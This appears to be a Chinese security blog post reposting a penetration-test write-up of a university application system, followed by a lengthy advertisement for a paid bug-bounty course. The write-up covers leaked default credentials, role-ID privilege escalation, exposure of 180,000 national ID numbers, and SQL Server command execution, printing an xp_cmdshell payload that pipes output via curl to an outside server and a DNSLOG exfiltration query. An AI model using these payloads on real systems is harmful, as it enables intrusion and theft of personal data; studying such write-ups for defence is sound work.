乐于分享
好东西不私藏

某211高校从一个文档到十八万条sfz泄露和命令执行

某211高校从一个文档到十八万条sfz泄露和命令执行

  课程培训

  扫码咨询

专注于SRC漏洞挖掘、红蓝对抗、渗透测试、代码审计JS逆向,CNVD和EDUSRC漏洞挖掘,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。加内部圈子,文末有彩蛋(课程培训限时优惠)。

文章作者:byname

文章来源:https://www.freebuf.com/articles/vuls/424493.html

01

0x1 某211高校从一个文档到十八万条sfz泄露和命令执行

一个非同寻常的信息泄露

开局一个登录框:

图片

右下角有一个”点击查看操作手册”就很显眼,让人很有想点击的欲望。

图片

现在了然了账号和密码的默认格式,于是便很兴奋地谷歌尝试搜索site:xxx.edu.cn filetype:pdf 学号的相应信息,但一无所获。

又去看看网站的前端代码,测测SQL注入,插件找一波接口…同样很正常地没用任何进展。

正当感到无计可施,想要切换下一个站点之际,一不小心又点进了刚才的”操作手册.doc”文档,然后无意识地往下翻动着:

图片
图片

除却姓名学号这种每个学校的文件都随处可见的信息,敏感信息都打上了码,不得不说,二幺幺高校就是不一样,安全意识确实做得很到位。

不对,好像掠过去了什么东西?

图片

利用泄露出来的学生信息成功登录!

图片
图片

然后就可以愉快地测试了^^

初步测试

垂直越权

返回登录框,抓包:

图片

经典roleId,常用来表示用户权限。也可以翻下前端找一下哪个数字代表哪个权限,这里就懒得翻了。

一般数字越小权限越大,这里直接改成1。

图片

提示用户不存在。

也许是sql语句执行where roleId=1没有查到,鉴权做得很棒啊!

试试改成2呢:

图片
图片
图片

新增成功!

image-20250310222523546

六六六盐都不盐了。

新增一个管理员账户,回看前端登录的样式知道肯定学生用户和管理员后台登录是分开的,那么下一步便是寻找登录接口。

看一眼Findsomething插件,刚好存在一个/loginadmin的接口:

image-20250310133946873

拼接一下url,成功得到管理员后台登录入口:

图片

登录刚刚新建的管理员账号:

图片

这里能看的东西就挺多了,在申请记录里存在大量学生申请的含有敏感信息的文件

甚至还能修改申请文件、印章的收费:

图片

一些踩坑

一个普通的账号常见的还有水平越权,比如对于这种情况下的学生账号,可以请求文件时抓包看看请求的参数是否可控,就可以通过修改参数如学号去查看其他人的敏感文件。

这是一个请求文件的数据包:

图片

有一个X-Authorization字段,解码可知是JWT验证,记录了user信息包括学号等,极大概率是控制返回文件的字段;userId为学号,修改后发包无果。

因为又没抓到其它有有效内容的返回包,所有的参数只有可能是从前端传出,便有些突发奇想尝试一下:也许这个fileProperty是这里控制返回文件的参数,比如是通过一些加密算法将学号加密成这样的形式,只要我能逆向定位到加密JS,用其它的学号加密然后发包就能越权看到其它人的文件。

于是开始了漫长的JS逆向之路,由于网站前端是webpack打包,还去学习了一下相应的逆向技术。

因为太菜、经验不足,浪费了许多时间后才突然惊觉,犯了一个基本的常识性错误:

这个参数的value形式一看就是UUID(唯一标识符),而UUID根本就不是学号,而可以看作一个随机数,每个人的都是随机唯一不可预测的,所以可以当作身份的唯一标识符被存储到数据库当作键值。

所以去逆向它完全是无意义的,犯大傻了。

越权超级管理员

借用管理员权限测试时,某些特殊功能还是会弹出一个权限不足的提示,比如改变邮箱模块等等。

于是猜测到这个站点还应该存在一个超级管理员权限。

只是回头看之前添加用户的功能点:

图片

网站是对添加超级管理员这个功能进行限制了的。

但是结合之前测得的这个网站的特性,添加一个任意账号,抓包看添加用户的数据包:

图片

修改roleIds参数为1。

添加成功!

image-20250310135542802

切回管理员登录接口,登录该账号:

图片

菜单的功能又多出了很多,其中,在某个菜单下,暴露了该校所有18w学生的sfz号码!

图片

RCE

深入每个功能都测了测,也得到了其它的一些敏感数据,但是大多却没什么用。

难道就止步于此了吗。。

都拿到了超管权限,信息泄露只是苟且,RCE才是梦想。

终于在茫茫多的功能中找到了一个很特殊的地方:

图片

可以编辑SQL语句。

且看文件名称,与学生用户端前台的”文件请求”一致:

图片

那么便很容易猜测,前台用户每点击一次文件,后端就肯定会执行一下所谓”报表SQL””菜单SQL”的语句并返回结果。

如果是这样的话,添加些恶意的SQL,比如外带数据库名等等,可能也会回显到得到的文件里。

不多说,开始测试。

由于这个网站的用户量还挺大,为了不影响学校网站的正常运行便拉着一个访问量最小的文件类型进行尝试。

图片

这一试花费的时间可就太多了,也遇到了挺多问题:

这个网站的报表SQL、菜单SQL还有前端都有牵连,字段甚至语法都不能弄错,否则很容易就会出问题,执行不了一点。

更让测试受阻的是每个用户申请文件,如果申请成功(但大多数时候数据库名都不会回显到文件里),网站都会对申请到的文件进行缓存,并沿用上一次SQL请求的返回结果,意味着我的每一次尝试都可能要换一个新的账户(只能说还好之前获取的账号很多)…….

终于,尝试了无数个payload,终于外带了一次数据:

1746537710_681a0cee9395fb6e32e3a.png!small?1746537710941
SELECT xb
FROM dbo.cxsyxm a
LEFT JOIN z_V_xxxxx b ON a.xh = b.xh
WHERE a.xh = '学号' AND a.rn = '选中值'
UNION 
SELECT db_name();
图片

在测试的过程中也知道了该数据库语法为SQL Server。

既然是SQL Server,而且是整段语句的完整传入,那么我们完全可以用SQL Server的exec xp_cmdshell来命令执行。

那么此时便可以新建一个test文件,先试试DNSLOG外带数据库名,来测试目标服务器是否出网:

图片
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
DECLARE @dbName NVARCHAR(128);
DECLARE @cmd NVARCHAR(400);
SET @dbName = DB_NAME();
SET @cmd = 'ping ' + @dbName + '.ch85c4.dnslog.cn';
EXEC xp_cmdshell @cmd;

登录学生账号请求对应文件:

图片

此时查看DNSLOG的解析记录:

图片

成功将数据库名带出!

那么接下来便是想要执行命令,这里便有一个踩坑:

由于在超管权限下看到的系统管理菜单处是LINUX系统

图片

所以便一直进行LINUX的命令执行,像是ls之类的命令。

后续再测试执行windows命令才成功执行,此时才反应过来这套系统是典型的站库分离,即WEB服务系统主机和数据库主机是分离开的

那么修改SQL语句为执行dir命令:

图片
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'dir 2>&1 | curl -X POST --data @- http://ip:port ';

成功在VPS上获得命令回显!

02

0x2 培训课程介绍

26

SRC漏洞挖掘培训课程

1.课程价格目前是450(后面也会随着人数越多,涨价)🌟师傅们还可以上车补票,冲冲冲!

2.报名成功送知识星球一个,拉内部小圈子交流群+SRC直播通知群!✨

3.一周2节课程,直播+录播形式,课程内容大家可以看课表,目前是第一期,一次报名永久无限听课!❤️

4.目前是第一期课程,后面比如说开了二、三期,都是不用在花钱的!

5.上课结束后,会把视频录播+课件笔记一起打包发直播群!

6.哔哩哔哩SRC课程公开课,链接🔗直达:

https://space.bilibili.com/642258933

SRC课程详情🔎:神农SRC 漏洞挖掘实战课:从 0 到 1 成为赏金猎人

内部小圈子知识星球详情🔎:强烈推荐一个永久的SRC挖掘、渗透攻防内部知识库
欢迎关注微信公众号:神农Sec,报名咨询添加微信:routing_love
开课两个月时间左右,课程目前已经累计加入了624个学员了,课程培训招生任火热持续中,师傅们对于我们课程感兴趣的,想要学习技术,找工作的可以咨询我报名

课程培训记录📝,每次上车在1-3小时之间,上课包括课程内部群大家交流氛围很好
课程上课笔记课件📒都会打包给师傅们,笔记都非常详细,很多几k价格的培训机构哪怕是课件笔记都没有的,我这里都是下课第一时间把录播+笔记打包发给大家!

平常也都会给学员进行一些项目发布,包括后面的工作、护网内推等,经常上麦交流,大家互相学习,简历优化等。
SRC漏洞挖掘课程培训已经两个星期了,期间也是创建了“回本小群”,希望学员回本越来越多,创建这个群主要是鼓励学员学习进步,以及不定时发小项目!

最后也是希望大家都可以赚钱,找到好工作🎉

培训时间不长,感谢🙏师傅们的喜报,很开心看到师傅们给我分享自己的成果,希望师傅们越来越强!

平常也会分享项目,下面是一些学员项目成果,群里报课的学员都是不抽成的,主要是帮助学员进行回本让大家都可以进步!

上课结束后,会把视频录播+课件笔记一起打包发直播群

「神农安全」知识星球目前已经累计2000+网络安全爱好者的加入!

后面也是小圈子做大起来了,师傅们也都喜欢看我文章,想着给大家教下src漏洞挖掘思路,所以自己花了很长时间做了✨课件和课表,都是纯自己手搓的,大家也可以看下课表的内容。

03

0x3 课程特色

课程主打真实一线SRC漏洞挖掘师傅是如何学习和挖掘SRC漏洞的,让你真正了解SRC漏洞挖掘,助力在岗人员和大学生的能力提升,掌握新的技能树,为下一次跳槽涨薪做好准备。本课程内容覆盖企业SRC、众测项目挖掘、护网HVV红蓝攻防技巧、CVE、CNVD、EDUSRC等平台通杀案例技巧挖掘方法。

本课程适合人群(光看不挖啥也不会)

1、想从0转行入行的大学生或自学者2、想从CTF比赛/Web或SRC进阶到项目实战的选手3、想参与项目/找工作/提高收入的转型者
课程价格:450元
报课成功的师傅们直接免费送内部小圈:一个知识星球+内部小圈子交流群
1、课程价格真心实惠,绝不割韭菜2、两三百的课程价格让你体会大几千的培训课程内容3、带着大家从0到1,本人上课坚持手搓课件(实战案例+知识体系)4、拒绝使用PPT演讲模式(无实操,很枯燥)
直播培训教学方式
课程一周1-2节课,课程特色涵盖直播多人上麦活跃回答,直播过程中有问题随时解决或私信我。拉微信群:一个知识星球内部小圈子交流群+课程培训直播通知群。有项目/工作/护网第一时间内推报课的师傅,一对一简历优化,助力在岗人员和大学生的能力提升。
一次报名每期均可永久学习,并且赠送内部「神农安全」知识星球,一对一永久解答、无保留教学!
欢迎关注微信公众号:神农Sec,报名咨询添加微信:routing_love
课程均为线上交付,报名成功后不支持退款
内部小圈子(知识星球+内部小圈子交流群+知识库)
对内部小圈子感兴趣的师傅们也可以看下下面的这个跳转链接,里面有对小圈子的详细介绍,报名课程成功的师傅们直接免费送一个(直接点击下面直接可以跳转)。
强烈推荐一个永久的SRC挖掘、渗透攻防内部知识库

讲师介绍

id:一个想当文人的黑客

欢迎关注微信公众号:神农Sec,报名咨询添加微信:routing_love

04

0x4 第一期挖洞培训课表内容

内部圈子介绍(报课赠送)

圈子专注于更新src/红蓝攻防相关:

1、维护更新src专项漏洞知识库,包含原理、挖掘技巧、实战案例2、知识星球专属微信“小圈子交流群”3、微信小群一起挖洞4、内部团队专属EDUSRC证书站漏洞报告5、分享src优质视频课程(企业src/EDUSRC/红蓝队攻防)6、分享src挖掘技巧tips7、不定期有众测、渗透测试项目(一起挣钱)8、不定期有工作招聘内推(工作/护网内推)9、送全国职业技能大赛环境+WP解析(比赛拿奖)10、十个专栏会持续更新~提前续费有优惠,好用不贵很实惠11、每日内部资料分享,内部圈子资料1000+12、联系圈主获取:内部漏洞知识库+圈子使用手册+内部圈子交流群13、VX:routing_love,技术交流+疑问解决

内部圈子专栏介绍

知识星球内部共享资料截屏详情如下

(只要没有特殊情况,每天都保持更新)

05

0x5 优秀学员报喜
下面是最近两个月培训期间,很多优秀学员进行报喜,看到师傅们有收获,也是感到很开心的!拉回本小群,就是为了促进大家学习,在群里发学员成果,也是为了让大家学习优秀的师傅们。
加油,你我皆是黑马!

神农安全公开交流群

有需要的师傅们直接扫描文章二维码加入,然后要是后面群聊二维码扫描加入不了的师傅们,直接扫描文章开头的二维码加我(备注加群)

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

往期回顾

手把手js逆向断点调试&js逆向前端加密对抗&企业SRC实战分享

浅谈src漏洞挖掘中容易出洞的几种姿势

HVV护网行动 | 分享最近攻防演练HVV漏洞复盘

攻防演练|分享最近一次攻防演练RTSP奇特之旅

JS漏洞挖掘|分享使用FindSomething联动的挖掘思路

渗透测试 | 从jeecg接口泄露到任意管理员用户接管+SQL注入漏洞

分享SRC中后台登录处站点的漏洞挖掘技巧

企业SRC支付漏洞&EDUSRC&众测挖掘思路技巧操作分享

渗透测试 | 分享某次项目上的渗透测试漏洞复盘


【宝典】分享云安全浪潮src漏洞挖掘技巧

实战SRC挖掘|微信小程序渗透漏洞复盘

综合资产测绘 | 手把手带你搞定信息收集

【宝典】针对若依系统nday的常见各种姿势利用